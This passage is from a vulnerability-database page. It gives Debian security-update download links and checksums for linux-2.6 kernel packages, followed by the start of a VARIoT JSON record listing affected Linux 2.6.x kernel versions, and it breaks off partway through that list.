http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 110394 68dd1fe380aa0c9ba6caa84f934569fd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 110416 c1d7fd64b9efab8228f305d5474de5d1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_s390.deb Size/MD5 checksum: 3598560 f63cbef687984b543d1152e013bc95fe

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 14291528 b0e802720e53cb53650b8a2d75d1588d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 304718 aa3ebf9c5e7cde5fc11513c27b4396d0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 110370 d746af2e449aaf644370d7b88a03cf2d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 14631258 b056f4f2245e4e2da6ef8e7549224226 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 14611896 ad3108a56bbacf863b4f18521275887c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 800838 114ac1590a19b405fcacfb06ee36e55a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 3820700 fff1d7baf26f32217a8100ca14875708 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 110352 02deff17df2e96a0ed208d786bdf9315 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 3785870 518b0d1f9d0d13adce8d6707726031ab http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 302894 c9354f7c9769be34b6356e0d042a294e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb Size/MD5 checksum: 304918 228d8163856c2e8e261b0fd086475d68

These files will probably be moved into the stable distribution on its next update

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201003-1068",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.27.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.27.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.27.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.27.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.27.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.27.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.27.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.29.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.30.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.28.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.30.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.27.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.29.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.31.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
